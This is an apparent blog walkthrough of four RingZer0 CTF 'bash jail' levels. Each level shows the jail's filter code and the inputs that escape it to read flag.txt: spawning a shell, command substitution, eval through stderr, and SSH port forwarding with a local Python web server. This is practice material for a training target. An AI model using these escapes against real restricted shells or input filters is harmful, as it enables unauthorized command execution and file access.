Using CTF’s to learn and keep sharp

Bash Jails — Level 1

ssh level1@ringzer0team.com -p 1016Password level1
BASH Jail Level 1:Current user is uid=1000(level1) gid=1000(level1) groups=1000(level1)Flag is located at /home/level1/flag.txtChallenge bash code:-----------------------------while :doecho "Your input:"read inputoutput=`$input`done-----------------------------Your input:
-----------------------------Your input:/bin/bashlevel1@lxc17-bash-jail:~$ ls 1>&2flag.txt  prompt.shlevel1@lxc17-bash-jail:~$ cat flag.txt 1>&2FLAG-XXXXXXXXXXXXXXXXXXXXXXXXXXlevel1@lxc17-bash-jail:~$

Bash jails — Level 2

ssh level2@ringzer0team.com -p 1016Password FLAG-XXXXXXXXXXXXXXXXXXXXXXXXXXXX
Current user is uid=1001(level2) gid=1001(level2) groups=1001(level2)Flag is located at /home/level2/flag.txtChallenge bash code:-----------------------------function check_space {if [[ $1 == *[bdks';''&'' ']* ]]thenreturn 0fireturn 1}while :doecho "Your input:"read inputif check_space "$input"thenecho -e '\033[0;31mRestricted characters has been used\033[0m'elseoutput="echo Your command is: $input"eval $outputfidone-----------------------------
$(<flag.txt)
Your input:“$(<flag.txt)”Your command is: FLAG-XXXXXXXXXXXXXXXXXXXXXXXXYour input:

Bash Jails — Level 3

RingZer0 Team Online CTFBASH Jail Level 3:Current user is uid=1002(level3) gid=1002(level3) groups=1002(level3)Flag is located at /home/level3/flag.txtChallenge bash code: — — — — — — — — — — — — — — -WARNING: this prompt is launched using ./prompt.sh 2>/dev/null# CHALLENGEfunction check_space {if [[ $1 == *[bdksc]* ]]thenreturn 0fireturn 1}while :doecho “Your input:”read inputif check_space “$input”thenecho -e ‘\033[0;31mRestricted characters has been used\033[0m’elseoutput=`$input` &>/dev/nullecho “Command executed”fidone — — — — — — — — — — — — — — -
output=`$input` &>/dev/null
Your input:Command executedYour input:eval $(<flag.txt) 2>&0./real.sh: line 39: FLAG-xxxxxxxxxxxxxxxxxxxxxxxxxxx: command not foundCommand executed

Bash Jails — Level 4

RingZer0 Team Online CTFBASH Jail Level 4:Current user is uid=1003(level4) gid=1003(level4) groups=1003(level4)Flag is located at /home/level4/flag.txtChallenge bash code: — — — — — — — — — — — — — — -WARNING: this prompt is launched using ./prompt.sh 2>/dev/null# CHALLENGEfunction check_space {if [[ $1 == *[bdksc’/’’<’’>’’&’’$’]* ]]thenreturn 0fireturn 1}while :doecho “Your input:”read inputif check_space “$input”thenecho -e ‘\033[0;31mRestricted characters has been used\033[0m’elseoutput=`$input < /dev/null` &>/dev/nullecho “Command executed”fidone — — — — — — — — — — — — — — -
$ ssh -L 11111:localhost:11111 level4@ringzer0team.com -p 1016
python -m SimpleHTTPServer 11111
Python
>>> import urllib2
>>> urllib2.urlopen(“http://127.0.0.1:11111/flag.txt").read()
‘FLAG-xxxxxxxxxxxxxxxxxxxxxx\n’
>>>

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Greg

Greg

Security addict, 17+ years in industry making systems more secure and finding those that aren’t